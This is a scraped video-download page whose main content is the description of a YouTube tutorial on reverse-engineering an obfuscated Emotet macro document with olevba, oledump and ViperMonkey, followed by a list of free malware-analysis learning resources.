Malware Analysis Malicious Document Emotet

>> DOWNLOAD LINK 🎞️ #1 <<

>> DOWNLOAD LINK 🎞️ #2 <<

>> COPY / PASTE LINK PLEASE 🎵 MP3 <<

>> YOUR LINK HERE: ___ http://youtube.com/watch?v=Crc-XDSDJm0

DISCLAIMER: NO SOUND (Intentional) • • Objective is to uncover the payload and the URLs that it's retrieved from by reverse-engineering the Emotet maldoc. This is usually the document sent in a phishing campaign, when opened and Macro-enabled, will download the 1st stage malware through PowerShell. • First step was understanding the Macros, but it was heavily obfuscated, so that was a nightmare (hence the name 'Nightmare_mode.doc'.) • We explore the following tools: Olevba, Oledump.py, and Vipermonkey. • Eventually, we say: Screw it, do it old school Linux-commands to find the pattern and filter them out for the PowerShell command.. Then there is some manual find and replace within a text document until I got the desired indicators. • ------------------ • A FOLLOW-UP TO REQUEST • How to get started? I have validated that you can access these for free, Medium... is kind of free but you're rationed out articles that you can read. • Primer:   / malware-analysis-primer   • Setting Up Lab: https://zeltser.com/build-malware-ana... • Setting Up Lab: https://www.sentinelone.com/labs/buil... • Setting Up:    • #1 How to Build a Malware Lab   • Dealing with Malicious Documents: https://blog.redbluepurple.io/other/m... • Basic Static Analysis:   / malware-analysis-techniques-basic-static-a...   • Courses - Misc • Malware Course: https://github.com/yassirlaaouissi/Ma... • Reverse Engineering 101: https://malwareunicorn.org/workshops/... • Guided Hands-on via TryHackMe: • MAL: Malware Introductory: https://tryhackme.com/room/malmalintr... • MAL: Researching: https://tryhackme.com/room/malresearc... • MAL: Strings: https://tryhackme.com/room/malstrings • • Assembly •    • Assembly - Pwn Zero To Hero 0x00  

#############################